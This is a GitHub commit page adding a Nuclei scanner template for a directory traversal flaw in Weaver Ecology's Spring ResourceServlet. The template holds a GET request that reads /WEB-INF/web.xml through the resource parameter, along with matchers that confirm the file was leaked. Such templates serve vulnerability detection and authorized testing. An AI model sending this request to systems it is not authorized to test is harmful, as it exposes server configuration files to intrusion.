Merge pull request #1352 from projectdiscovery/princechaddha-patch-17

Create ecology-springframework-directory-traversal.yaml
patch-1
Prince Chaddha 2021-04-26 20:48:30 +05:30 committed by GitHub
commit 4cc83776f3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions

View File

@ -0,0 +1,20 @@
id: ecology-springframework-directory-traversal
info:
name: Ecology Springframework Directory Traversal
author: princechaddha
severity: medium
tags: ecology,springframework,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<url-pattern>/weaver/"
part: body